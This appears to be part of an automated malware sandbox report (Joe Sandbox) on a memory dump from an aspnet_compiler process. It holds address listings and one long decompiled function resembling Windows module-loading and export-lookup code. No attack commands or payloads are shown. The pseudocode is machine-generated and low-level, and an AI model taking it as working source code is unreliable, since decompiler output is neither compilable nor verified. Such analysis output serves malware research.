                          0x01465a5f
                          0x01465a71
                          0x01465a61
                          0x01465a6a
                          0x01465a6a
                          0x01465a76
                          0x01465a79
                          0x01465a7f
                          0x01465a83
                          0x01465a85
                          0x01465a87
                          0x01465a87
                          0x01465a8c
                          0x01465a91
                          0x01465a97
                          0x01465a9f
                          0x01465aa0
                          0x01465aa1
                          0x01465aa6
                          0x01465aab
                          0x01465ab1
                          0x01465ab3
                          0x01465ab9
                          0x01465aca
                          0x01465ad4
                          0x01465ad4
                          0x01465ade
                          0x01465ade
                          0x01465aab
                          0x01465a79
                          0x01465a52
                          0x014221f7
                          0x014221f9
                          0x014221fe
                          0x014221fe
                          0x014221e3
                          0x01422195
                          0x0142236c
                          0x01422122
                          0x01422122
                          0x01422124
                          0x01422231
                          0x01422236
                          0x01422236
                          0x01422238
                          0x01422238
                          0x01422240
                          0x01422242
                          0x01422244
                          0x014659fc
                          0x0142218c
                          0x0142218c
                          0x00000000
                          0x0142218c
                          0x0142224a
                          0x0142224f
                          0x01422256
                          0x01422304
                          0x01422309
                          0x0142230f
                          0x0142231e
                          0x0142231e
                          0x0142231e
                          0x01422320
                          0x01422325
                          0x0142232a
                          0x0142232c
                          0x0142233e
                          0x0142233e
                          0x00000000
                          0x0142232c
                          0x01422311
                          0x01422317
                          0x0142231a
                          0x0142231c
                          0x01422380
                          0x01422380
                          0x01422380
                          0x01422384
                          0x00000000
                          0x00000000
                          0x01422386
                          0x00000000
                          0x0142231c
                          0x0142225c
                          0x0142225c
                          0x00000000
                          0x0142225c
                          0x0142212a
                          0x01422134
                          0x01422138
                          0x0142213d
                          0x01465858
                          0x01465863
                          0x01465863
                          0x01465867
                          0x0146586a
                          0x00000000
                          0x00000000
                          0x0146586c
                          0x0146586c
                          0x01465871
                          0x01465875
                          0x01465877
                          0x01465997
                          0x0146599c
                          0x014659a1
                          0x014659a7
                          0x014659a7
                          0x00000000
                          0x014659a7
                          0x0146587d
                          0x00000000
                          0x0146588b
                          0x0146588b
                          0x01465890
                          0x01465892
                          0x01465894
                          0x01465899
                          0x0146589b
                          0x014658a0
                          0x014658a0
                          0x014658aa
                          0x014658b2
                          0x014658b6
                          0x014658be
                          0x014658c6
                          0x014658c9
                          0x0146590d
                          0x01465917
                          0x0146591a
                          0x0146591c
                          0x01465920
                          0x01465928
                          0x0146592a
                          0x0146592c
                          0x0146592e
                          0x0146592e
                          0x014658cb
                          0x014658cd
                          0x014658d8
                          0x014658e0
                          0x014658f4
                          0x014658fe
                          0x014658fe
                          0x0146593a
                          0x0146593e
                          0x01465940
                          0x01465942
                          0x00000000
                          0x01465944
                          0x01465944
                          0x01465949
                          0x0146594e
                          0x0146594e
                          0x01465953
                          0x0146595b
                          0x01465976
                          0x01465976
                          0x0146597a
                          0x0146597f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01465981
                          0x01465981
                          0x01465981
                          0x01465983
                          0x01465988
                          0x0146598d
                          0x01465991
                          0x01465991
                          0x00000000
                          0x0146595d
                          0x0146595d
                          0x01465963
                          0x01465965
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01465967
                          0x01465967
                          0x0146596b
                          0x0146596d
                          0x00000000
                          0x00000000
                          0x0146596f
                          0x01465971
                          0x01465971
                          0x01465974
                          0x00000000
                          0x00000000
                          0x00000000
                          0x01465974
                          0x00000000
                          0x01465967
                          0x0146595b
                          0x01465942
                          0x01465863
                          0x01422143
                          0x01422143
                          0x01422149
                          0x0142214f
                          0x014222f1
                          0x014222f6
                          0x00000000
                          0x01422173
                          0x01422173
                          0x0142217d
                          0x01422181
                          0x01422186
                          0x014659ae
                          0x014659b2
                          0x014659b5
                          0x014659b7
                          0x014659ba
                          0x014659cd
                          0x014659d1
                          0x014659d5
                          0x014659d9
                          0x014659db
                          0x00000000
                          0x00000000
                          0x014659dd
                          0x014659dd
                          0x014659e1
                          0x014659e4
                          0x014659e7
                          0x014659ee
                          0x014659ee
                          0x014659f3
                          0x014659f3
                          0x00000000
                          0x01422186
                          0x0142214f
                          0x01422106
                          0x01422266
                          0x014220d8
                          0x014220da
                          0x014220e0
                          0x00000000
                          0x00000000
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 326ac4c4ce5de7c3f88ad650fb9b82b58cb21a58e86ae08b21fd894a05a42c01
                          • Instruction ID: 606ae82affb9712f391994365a13805a694cd65e8e304f7269cfa75a69470aec
                          • Opcode Fuzzy Hash: 326ac4c4ce5de7c3f88ad650fb9b82b58cb21a58e86ae08b21fd894a05a42c01
                          • Instruction Fuzzy Hash: ADF144306083128FDB26CB2CC440B2B7BE5AF95368F54851FE9949B3B1D7B4C881CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E0140D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                          				signed int _v8;
                          				intOrPtr _v20;
                          				signed int _v36;
                          				intOrPtr* _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed char _v52;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				intOrPtr _v80;
                          				signed int _v84;
                          				intOrPtr _v100;
                          				intOrPtr _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				intOrPtr _v120;
                          				signed int _v132;
                          				char _v140;
                          				char _v144;
                          				char _v157;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v169;
                          				intOrPtr _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				intOrPtr _v188;
                          				signed int _v192;
                          				signed int _v200;
                          				signed int _v208;
                          				intOrPtr* _v212;
                          				char _v216;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t204;
                          				void* _t208;
                          				signed int _t211;
                          				signed int _t216;
                          				intOrPtr _t217;
                          				intOrPtr* _t218;
                          				signed int _t226;
                          				signed int _t239;
                          				signed int* _t247;
                          				signed int _t249;
                          				void* _t252;
                          				signed int _t256;
                          				signed int _t269;
                          				signed int _t271;
                          				signed int _t277;
                          				signed int _t279;
                          				intOrPtr _t283;
                          				signed int _t287;
                          				signed int _t288;
                          				void* _t289;
                          				signed char _t290;
                          				signed int _t292;
                          				signed int* _t293;
                          				signed int _t306;
                          				signed int _t307;
                          				signed int _t308;
                          				signed int _t309;
                          				signed int _t310;
                          				intOrPtr _t311;
                          				intOrPtr _t312;
                          				signed int _t319;
                          				signed int _t320;
                          				signed int* _t324;
                          				signed int _t337;
                          				signed int _t338;
                          				signed int _t339;
                          				signed int* _t340;
                          				void* _t341;
                          				signed int _t344;
                          				signed int _t348;
                          				signed int _t349;
                          				signed int _t351;
                          				intOrPtr _t353;
                          				void* _t354;
                          				signed int _t356;
                          				signed int _t358;
                          				intOrPtr _t359;
                          				signed int _t363;
                          				signed short* _t365;
                          				void* _t367;
                          				intOrPtr _t369;
                          				void* _t370;
                          				signed int _t371;
                          				signed int _t372;
                          				void* _t374;
                          				signed int _t376;
                          				void* _t384;
                          				signed int _t387;
                          
                          				_v8 =  *0x14ed360 ^ _t376;
                          				_t2 =  &_a20;
                          				 *_t2 = _a20 & 0x00000001;
                          				_t287 = _a4;
                          				_v200 = _a12;
                          				_t365 = _a8;
                          				_v212 = _a16;
                          				_v180 = _a24;
                          				_v168 = 0;
                          				_v157 = 0;
                          				if( *_t2 != 0) {
                          					__eflags = E01406600(0x14e52d8);
                          					if(__eflags == 0) {
                          						goto L1;
                          					} else {
                          						_v188 = 6;
                          					}
                          				} else {
                          					L1:
                          					_v188 = 9;
                          				}
                          				if(_t365 == 0) {
                          					_v164 = 0;
                          					goto L5;
                          				} else {
                          					_t363 =  *_t365 & 0x0000ffff;
                          					_t341 = _t363 + 1;
                          					if((_t365[1] & 0x0000ffff) < _t341) {
                          						L109:
                          						__eflags = _t341 - 0x80;
                          						if(_t341 <= 0x80) {
                          							_t281 =  &_v140;
                          							_v164 =  &_v140;
                          							goto L114;
                          						} else {
                          							_t283 =  *0x14e7b9c; // 0x0
                          							_t281 = L01414620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                          							_v164 = _t281;
                          							__eflags = _t281;
                          							if(_t281 != 0) {
                          								_v157 = 1;
                          								L114:
                          								E0143F3E0(_t281, _t365[2], _t363);
                          								_t200 = _v164;
                          								 *((char*)(_v164 + _t363)) = 0;
                          								goto L5;
                          							} else {
                          								_t204 = 0xc000009a;
                          								goto L47;
                          							}
                          						}
                          					} else {
                          						_t200 = _t365[2];
                          						_v164 = _t200;
                          						if( *((char*)(_t200 + _t363)) != 0) {
                          							goto L109;
                          						} else {
                          							while(1) {
                          								L5:
                          								_t353 = 0;
                          								_t342 = 0x1000;
                          								_v176 = 0;
                          								if(_t287 == 0) {
                          									break;
                          								}
                          								_t384 = _t287 -  *0x14e7b90; // 0x775e0000
                          								if(_t384 == 0) {
                          									_t353 =  *0x14e7b8c; // 0xfa2a70
                          									_v176 = _t353;
                          									_t320 = ( *(_t353 + 0x50))[8];
                          									_v184 = _t320;
                          								} else {
                          									E01412280(_t200, 0x14e84d8);
                          									_t277 =  *0x14e85f4; // 0xfa2f60
                          									_t351 =  *0x14e85f8 & 1;
                          									while(_t277 != 0) {
                          										_t337 =  *(_t277 - 0x50);
                          										if(_t337 > _t287) {
                          											_t338 = _t337 | 0xffffffff;
                          										} else {
                          											asm("sbb ecx, ecx");
                          											_t338 =  ~_t337;
                          										}
                          										_t387 = _t338;
                          										if(_t387 < 0) {
                          											_t339 =  *_t277;
                          											__eflags = _t351;
                          											if(_t351 != 0) {
                          												__eflags = _t339;
                          												if(_t339 == 0) {
                          													goto L16;
                          												} else {
                          													goto L118;
                          												}
                          												goto L151;
                          											} else {
                          												goto L16;
                          											}
                          											goto L17;
                          										} else {
                          											if(_t387 <= 0) {
                          												__eflags = _t277;
                          												if(_t277 != 0) {
                          													_t340 =  *(_t277 - 0x18);
                          													_t24 = _t277 - 0x68; // 0xfa2ef8
                          													_t353 = _t24;
                          													_v176 = _t353;
                          													__eflags = _t340[3] - 0xffffffff;
                          													if(_t340[3] != 0xffffffff) {
                          														_t279 =  *_t340;
                          														__eflags =  *(_t279 - 0x20) & 0x00000020;
                          														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                          															asm("lock inc dword [edi+0x9c]");
                          															_t340 =  *(_t353 + 0x50);
                          														}
                          													}
                          													_v184 = _t340[8];
                          												}
                          											} else {
                          												_t339 =  *(_t277 + 4);
                          												if(_t351 != 0) {
                          													__eflags = _t339;
                          													if(_t339 == 0) {
                          														goto L16;
                          													} else {
                          														L118:
                          														_t277 = _t277 ^ _t339;
                          														goto L17;
                          													}
                          													goto L151;
                          												} else {
                          													L16:
                          													_t277 = _t339;
                          												}
                          												goto L17;
                          											}
                          										}
                          										goto L25;
                          										L17:
                          									}
                          									L25:
                          									E0140FFB0(_t287, _t353, 0x14e84d8);
                          									_t320 = _v184;
                          									_t342 = 0x1000;
                          								}
                          								if(_t353 == 0) {
                          									break;
                          								} else {
                          									_t366 = 0;
                          									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                          										_t288 = _v164;
                          										if(_t353 != 0) {
                          											_t342 = _t288;
                          											_t374 = E0144CC99(_t353, _t288, _v200, 1,  &_v168);
                          											if(_t374 >= 0) {
                          												if(_v184 == 7) {
                          													__eflags = _a20;
                          													if(__eflags == 0) {
                          														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                          														if(__eflags != 0) {
                          															_t271 = E01406600(0x14e52d8);
                          															__eflags = _t271;
                          															if(__eflags == 0) {
                          																_t342 = 0;
                          																_v169 = _t271;
                          																_t374 = E01407926( *(_t353 + 0x50), 0,  &_v169);
                          															}
                          														}
                          													}
                          												}
                          												if(_t374 < 0) {
                          													_v168 = 0;
                          												} else {
                          													if( *0x14eb239 != 0) {
                          														_t342 =  *(_t353 + 0x18);
                          														E0147E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                          													}
                          													if( *0x14e8472 != 0) {
                          														_v192 = 0;
                          														_t342 =  *0x7ffe0330;
                          														asm("ror edi, cl");
                          														 *0x14eb1e0( &_v192, _t353, _v168, 0, _v180);
                          														 *( *0x14eb218 ^  *0x7ffe0330)();
                          														_t269 = _v192;
                          														_t353 = _v176;
                          														__eflags = _t269;
                          														if(__eflags != 0) {
                          															_v168 = _t269;
                          														}
                          													}
                          												}
                          											}
                          											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                          												_t366 = 0xc000007a;
                          											}
                          											_t247 =  *(_t353 + 0x50);
                          											if(_t247[3] == 0xffffffff) {
                          												L40:
                          												if(_t366 == 0xc000007a) {
                          													__eflags = _t288;
                          													if(_t288 == 0) {
                          														goto L136;
                          													} else {
                          														_t366 = 0xc0000139;
                          													}
                          													goto L54;
                          												}
                          											} else {
                          												_t249 =  *_t247;
                          												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                          													goto L40;
                          												} else {
                          													_t250 = _t249 | 0xffffffff;
                          													asm("lock xadd [edi+0x9c], eax");
                          													if((_t249 | 0xffffffff) == 0) {
                          														E01412280(_t250, 0x14e84d8);
                          														_t342 =  *(_t353 + 0x54);
                          														_t165 = _t353 + 0x54; // 0x54
                          														_t252 = _t165;
                          														__eflags =  *(_t342 + 4) - _t252;
                          														if( *(_t342 + 4) != _t252) {
                          															L135:
                          															asm("int 0x29");
                          															L136:
                          															_t288 = _v200;
                          															_t366 = 0xc0000138;
                          															L54:
                          															_t342 = _t288;
                          															L01433898(0, _t288, _t366);
                          														} else {
                          															_t324 =  *(_t252 + 4);
                          															__eflags =  *_t324 - _t252;
                          															if( *_t324 != _t252) {
                          																goto L135;
                          															} else {
                          																 *_t324 = _t342;
                          																 *(_t342 + 4) = _t324;
                          																_t293 =  *(_t353 + 0x50);
                          																_v180 =  *_t293;
                          																E0140FFB0(_t293, _t353, 0x14e84d8);
                          																__eflags =  *((short*)(_t353 + 0x3a));
                          																if( *((short*)(_t353 + 0x3a)) != 0) {
                          																	_t342 = 0;
                          																	__eflags = 0;
                          																	E014337F5(_t353, 0);
                          																}
                          																E01430413(_t353);
                          																_t256 =  *(_t353 + 0x48);
                          																__eflags = _t256;
                          																if(_t256 != 0) {
                          																	__eflags = _t256 - 0xffffffff;
                          																	if(_t256 != 0xffffffff) {
                          																		E01429B10(_t256);
                          																	}
                          																}
                          																__eflags =  *(_t353 + 0x28);
                          																if( *(_t353 + 0x28) != 0) {
                          																	_t174 = _t353 + 0x24; // 0x24
                          																	E014202D6(_t174);
                          																}
                          																L014177F0( *0x14e7b98, 0, _t353);
                          																__eflags = _v180 - _t293;
                          																if(__eflags == 0) {
                          																	E0142C277(_t293, _t366);
                          																}
                          																_t288 = _v164;
                          																goto L40;
                          															}
                          														}
                          													} else {
                          														goto L40;
                          													}
                          												}
                          											}
                          										}
                          									} else {
                          										L0140EC7F(_t353);
                          										L014219B8(_t287, 0, _t353, 0);
                          										_t200 = E013FF4E3(__eflags);
                          										continue;
                          									}
                          								}
                          								L41:
                          								if(_v157 != 0) {
                          									L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                          								}
                          								if(_t366 < 0 || ( *0x14eb2f8 |  *0x14eb2fc) == 0 || ( *0x14eb2e4 & 0x00000001) != 0) {
                          									L46:
                          									 *_v212 = _v168;
                          									_t204 = _t366;
                          									L47:
                          									_pop(_t354);
                          									_pop(_t367);
                          									_pop(_t289);
                          									return E0143B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                          								} else {
                          									_v200 = 0;
                          									if(( *0x14eb2ec >> 0x00000008 & 0x00000003) == 3) {
                          										_t355 = _v168;
                          										_t342 =  &_v208;
                          										_t208 = E014A6B68(_v168,  &_v208, _v168, __eflags);
                          										__eflags = _t208 - 1;
                          										if(_t208 == 1) {
                          											goto L46;
                          										} else {
                          											__eflags = _v208 & 0x00000010;
                          											if((_v208 & 0x00000010) == 0) {
                          												goto L46;
                          											} else {
                          												_t342 = 4;
                          												_t366 = E014A6AEB(_t355, 4,  &_v216);
                          												__eflags = _t366;
                          												if(_t366 >= 0) {
                          													goto L46;
                          												} else {
                          													asm("int 0x29");
                          													_t356 = 0;
                          													_v44 = 0;
                          													_t290 = _v52;
                          													__eflags = 0;
                          													if(0 == 0) {
                          														L108:
                          														_t356 = 0;
                          														_v44 = 0;
                          														goto L63;
                          													} else {
                          														__eflags = 0;
                          														if(0 < 0) {
                          															goto L108;
                          														}
                          														L63:
                          														_v112 = _t356;
                          														__eflags = _t356;
                          														if(_t356 == 0) {
                          															L143:
                          															_v8 = 0xfffffffe;
                          															_t211 = 0xc0000089;
                          														} else {
                          															_v36 = 0;
                          															_v60 = 0;
                          															_v48 = 0;
                          															_v68 = 0;
                          															_v44 = _t290 & 0xfffffffc;
                          															E0140E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                          															_t306 = _v68;
                          															__eflags = _t306;
                          															if(_t306 == 0) {
                          																_t216 = 0xc000007b;
                          																_v36 = 0xc000007b;
                          																_t307 = _v60;
                          															} else {
                          																__eflags = _t290 & 0x00000001;
                          																if(__eflags == 0) {
                          																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                          																	__eflags = _t349 - 0x10b;
                          																	if(_t349 != 0x10b) {
                          																		__eflags = _t349 - 0x20b;
                          																		if(_t349 == 0x20b) {
                          																			goto L102;
                          																		} else {
                          																			_t307 = 0;
                          																			_v48 = 0;
                          																			_t216 = 0xc000007b;
                          																			_v36 = 0xc000007b;
                          																			goto L71;
                          																		}
                          																	} else {
                          																		L102:
                          																		_t307 =  *(_t306 + 0x50);
                          																		goto L69;
                          																	}
                          																	goto L151;
                          																} else {
                          																	_t239 = L0140EAEA(_t290, _t290, _t356, _t366, __eflags);
                          																	_t307 = _t239;
                          																	_v60 = _t307;
                          																	_v48 = _t307;
                          																	__eflags = _t307;
                          																	if(_t307 != 0) {
                          																		L70:
                          																		_t216 = _v36;
                          																	} else {
                          																		_push(_t239);
                          																		_push(0x14);
                          																		_push( &_v144);
                          																		_push(3);
                          																		_push(_v44);
                          																		_push(0xffffffff);
                          																		_t319 = E01439730();
                          																		_v36 = _t319;
                          																		__eflags = _t319;
                          																		if(_t319 < 0) {
                          																			_t216 = 0xc000001f;
                          																			_v36 = 0xc000001f;
                          																			_t307 = _v60;
                          																		} else {
                          																			_t307 = _v132;
                          																			L69:
                          																			_v48 = _t307;
                          																			goto L70;
                          																		}
                          																	}
                          																}
                          															}
                          															L71:
                          															_v72 = _t307;
                          															_v84 = _t216;
                          															__eflags = _t216 - 0xc000007b;
                          															if(_t216 == 0xc000007b) {
                          																L150:
                          																_v8 = 0xfffffffe;
                          																_t211 = 0xc000007b;
                          															} else {
                          																_t344 = _t290 & 0xfffffffc;
                          																_v76 = _t344;
                          																__eflags = _v40 - _t344;
                          																if(_v40 <= _t344) {
                          																	goto L150;
                          																} else {
                          																	__eflags = _t307;
                          																	if(_t307 == 0) {
                          																		L75:
                          																		_t217 = 0;
                          																		_v104 = 0;
                          																		__eflags = _t366;
                          																		if(_t366 != 0) {
                          																			__eflags = _t290 & 0x00000001;
                          																			if((_t290 & 0x00000001) != 0) {
                          																				_t217 = 1;
                          																				_v104 = 1;
                          																			}
                          																			_t290 = _v44;
                          																			_v52 = _t290;
                          																		}
                          																		__eflags = _t217 - 1;
                          																		if(_t217 != 1) {
                          																			_t369 = 0;
                          																			_t218 = _v40;
                          																			goto L91;
                          																		} else {
                          																			_v64 = 0;
                          																			E0140E9C0(1, _t290, 0, 0,  &_v64);
                          																			_t309 = _v64;
                          																			_v108 = _t309;
                          																			__eflags = _t309;
                          																			if(_t309 == 0) {
                          																				goto L143;
                          																			} else {
                          																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                          																				__eflags = _t226 - 0x10b;
                          																				if(_t226 != 0x10b) {
                          																					__eflags = _t226 - 0x20b;
                          																					if(_t226 != 0x20b) {
                          																						goto L143;
                          																					} else {
                          																						_t371 =  *(_t309 + 0x98);
                          																						goto L83;
                          																					}
                          																				} else {
                          																					_t371 =  *(_t309 + 0x88);
                          																					L83:
                          																					__eflags = _t371;
                          																					if(_t371 != 0) {
                          																						_v80 = _t371 - _t356 + _t290;
                          																						_t310 = _v64;
                          																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                          																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                          																						_t311 = 0;
                          																						__eflags = 0;
                          																						while(1) {
                          																							_v120 = _t311;
                          																							_v116 = _t348;
                          																							__eflags = _t311 - _t292;
                          																							if(_t311 >= _t292) {
                          																								goto L143;
                          																							}
                          																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                          																							__eflags = _t371 - _t359;
                          																							if(_t371 < _t359) {
                          																								L98:
                          																								_t348 = _t348 + 0x28;
                          																								_t311 = _t311 + 1;
                          																								continue;
                          																							} else {
                          																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                          																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                          																									goto L98;
                          																								} else {
                          																									__eflags = _t348;
                          																									if(_t348 == 0) {
                          																										goto L143;
                          																									} else {
                          																										_t218 = _v40;
                          																										_t312 =  *_t218;
                          																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                          																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                          																											_v100 = _t359;
                          																											_t360 = _v108;
                          																											_t372 = L01408F44(_v108, _t312);
                          																											__eflags = _t372;
                          																											if(_t372 == 0) {
                          																												goto L143;
                          																											} else {
                          																												_t290 = _v52;
                          																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01433C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                          																												_t307 = _v72;
                          																												_t344 = _v76;
                          																												_t218 = _v40;
                          																												goto L91;
                          																											}
                          																										} else {
                          																											_t290 = _v52;
                          																											_t307 = _v72;
                          																											_t344 = _v76;
                          																											_t369 = _v80;
                          																											L91:
                          																											_t358 = _a4;
                          																											__eflags = _t358;
                          																											if(_t358 == 0) {
                          																												L95:
                          																												_t308 = _a8;
                          																												__eflags = _t308;
                          																												if(_t308 != 0) {
                          																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                          																												}
                          																												_v8 = 0xfffffffe;
                          																												_t211 = _v84;
                          																											} else {
                          																												_t370 =  *_t218 - _t369 + _t290;
                          																												 *_t358 = _t370;
                          																												__eflags = _t370 - _t344;
                          																												if(_t370 <= _t344) {
                          																													L149:
                          																													 *_t358 = 0;
                          																													goto L150;
                          																												} else {
                          																													__eflags = _t307;
                          																													if(_t307 == 0) {
                          																														goto L95;
                          																													} else {
                          																														__eflags = _t370 - _t344 + _t307;
                          																														if(_t370 >= _t344 + _t307) {
                          																															goto L149;
                          																														} else {
                          																															goto L95;
                          																														}
                          																													}
                          																												}
                          																											}
                          																										}
                          																									}
                          																								}
                          																							}
                          																							goto L97;
                          																						}
                          																					}
                          																					goto L143;
                          																				}
                          																			}
                          																		}
                          																	} else {
                          																		__eflags = _v40 - _t307 + _t344;
                          																		if(_v40 >= _t307 + _t344) {
                          																			goto L150;
                          																		} else {
                          																			goto L75;
                          																		}
                          																	}
                          																}
                          															}
                          														}
                          														L97:
                          														 *[fs:0x0] = _v20;
                          														return _t211;
                          													}
                          												}
                          											}
                          										}
                          									} else {
                          										goto L46;
                          									}
                          								}
                          								goto L151;
                          							}
                          							_t288 = _v164;
                          							_t366 = 0xc0000135;
                          							goto L41;
                          						}
                          					}
                          				}
                          				L151:
                          			}





































































































                          0x0140d5f2
                          0x0140d5f5
                          0x0140d5f5
                          0x0140d5fd
                          0x0140d600
                          0x0140d60a
                          0x0140d60d
                          0x0140d617
                          0x0140d61d
                          0x0140d627
                          0x0140d62e
                          0x0140d911
                          0x0140d913
                          0x00000000
                          0x0140d919
                          0x0140d919
                          0x0140d919
                          0x0140d634
                          0x0140d634
                          0x0140d634
                          0x0140d634
                          0x0140d640
                          0x0140d8bf
                          0x00000000
                          0x0140d646
                          0x0140d646
                          0x0140d64d
                          0x0140d652
                          0x0145b2fc
                          0x0145b2fc
                          0x0145b302
                          0x0145b33b
                          0x0145b341
                          0x00000000
                          0x0145b304
                          0x0145b304
                          0x0145b319
                          0x0145b31e
                          0x0145b324
                          0x0145b326
                          0x0145b332
                          0x0145b347
                          0x0145b34c
                          0x0145b351
                          0x0145b35a
                          0x00000000
                          0x0145b328
                          0x0145b328
                          0x00000000
                          0x0145b328
                          0x0145b326
                          0x0140d658
                          0x0140d658
                          0x0140d65b
                          0x0140d665
                          0x00000000
                          0x0140d66b
                          0x0140d66b
                          0x0140d66b
                          0x0140d66b
                          0x0140d66d
                          0x0140d672
                          0x0140d67a
                          0x00000000
                          0x00000000
                          0x0140d680
                          0x0140d686
                          0x0140d8ce
                          0x0140d8d4
                          0x0140d8dd
                          0x0140d8e0
                          0x0140d68c
                          0x0140d691
                          0x0140d69d
                          0x0140d6a2
                          0x0140d6a7
                          0x0140d6b0
                          0x0140d6b5
                          0x0140d6e0
                          0x0140d6b7
                          0x0140d6b7
                          0x0140d6b9
                          0x0140d6b9
                          0x0140d6bb
                          0x0140d6bd
                          0x0140d6ce
                          0x0140d6d0
                          0x0140d6d2
                          0x0145b363
                          0x0145b365
                          0x00000000
                          0x0145b36b
                          0x00000000
                          0x0145b36b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0140d6bf
                          0x0140d6bf
                          0x0140d6e5
                          0x0140d6e7
                          0x0140d6e9
                          0x0140d6ec
                          0x0140d6ec
                          0x0140d6ef
                          0x0140d6f5
                          0x0140d6f9
                          0x0140d6fb
                          0x0140d6fd
                          0x0140d701
                          0x0140d703
                          0x0140d70a
                          0x0140d70a
                          0x0140d701
                          0x0140d710
                          0x0140d710
                          0x0140d6c1
                          0x0140d6c1
                          0x0140d6c6
                          0x0145b36d
                          0x0145b36f
                          0x00000000
                          0x0145b375
                          0x0145b375
                          0x0145b375
                          0x00000000
                          0x0145b375
                          0x00000000
                          0x0140d6cc
                          0x0140d6d8
                          0x0140d6d8
                          0x0140d6d8
                          0x00000000
                          0x0140d6c6
                          0x0140d6bf
                          0x00000000
                          0x0140d6da
                          0x0140d6da
                          0x0140d716
                          0x0140d71b
                          0x0140d720
                          0x0140d726
                          0x0140d726
                          0x0140d72d
                          0x00000000
                          0x0140d733
                          0x0140d739
                          0x0140d742
                          0x0140d750
                          0x0140d758
                          0x0140d764
                          0x0140d776
                          0x0140d77a
                          0x0140d783
                          0x0140d928
                          0x0140d92c
                          0x0140d93d
                          0x0140d944
                          0x0140d94f
                          0x0140d954
                          0x0140d956
                          0x0140d95f
                          0x0140d961
                          0x0140d973
                          0x0140d973
                          0x0140d956
                          0x0140d944
                          0x0140d92c
                          0x0140d78b
                          0x0145b394
                          0x0140d791
                          0x0140d798
                          0x0145b3a3
                          0x0145b3bb
                          0x0145b3bb
                          0x0140d7a5
                          0x0140d866
                          0x0140d870
                          0x0140d892
                          0x0140d898
                          0x0140d89e
                          0x0140d8a0
                          0x0140d8a6
                          0x0140d8ac
                          0x0140d8ae
                          0x0140d8b4
                          0x0140d8b4
                          0x0140d8ae
                          0x0140d7a5
                          0x0140d78b
                          0x0140d7b1
                          0x0145b3c5
                          0x0145b3c5
                          0x0140d7c3
                          0x0140d7ca
                          0x0140d7e5
                          0x0140d7eb
                          0x0140d8eb
                          0x0140d8ed
                          0x00000000
                          0x0140d8f3
                          0x0140d8f3
                          0x0140d8f3
                          0x00000000
                          0x0140d8ed
                          0x0140d7cc
                          0x0140d7cc
                          0x0140d7d2
                          0x00000000
                          0x0140d7d4
                          0x0140d7d4
                          0x0140d7d7
                          0x0140d7df
                          0x0145b3d4
                          0x0145b3d9
                          0x0145b3dc
                          0x0145b3dc
                          0x0145b3df
                          0x0145b3e2
                          0x0145b468
                          0x0145b46d
                          0x0145b46f
                          0x0145b46f
                          0x0145b475
                          0x0140d8f8
                          0x0140d8f9
                          0x0140d8fd
                          0x0145b3e8
                          0x0145b3e8
                          0x0145b3eb
                          0x0145b3ed
                          0x00000000
                          0x0145b3ef
                          0x0145b3ef
                          0x0145b3f1
                          0x0145b3f4
                          0x0145b3fe
                          0x0145b404
                          0x0145b409
                          0x0145b40e
                          0x0145b410
                          0x0145b410
                          0x0145b414
                          0x0145b414
                          0x0145b41b
                          0x0145b420
                          0x0145b423
                          0x0145b425
                          0x0145b427
                          0x0145b42a
                          0x0145b42d
                          0x0145b42d
                          0x0145b42a
                          0x0145b432
                          0x0145b436
                          0x0145b438
                          0x0145b43b
                          0x0145b43b
                          0x0145b449
                          0x0145b44e
                          0x0145b454
                          0x0145b458
                          0x0145b458
                          0x0145b45d
                          0x00000000
                          0x0145b45d
                          0x0145b3ed
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0140d7df
                          0x0140d7d2
                          0x0140d7ca
                          0x0145b37c
                          0x0145b37e
                          0x0145b385
                          0x0145b38a
                          0x00000000
                          0x0145b38a
                          0x0140d742
                          0x0140d7f1
                          0x0140d7f8
                          0x0145b49b
                          0x0145b49b
                          0x0140d800
                          0x0140d837
                          0x0140d843
                          0x0140d845
                          0x0140d847
                          0x0140d84a
                          0x0140d84b
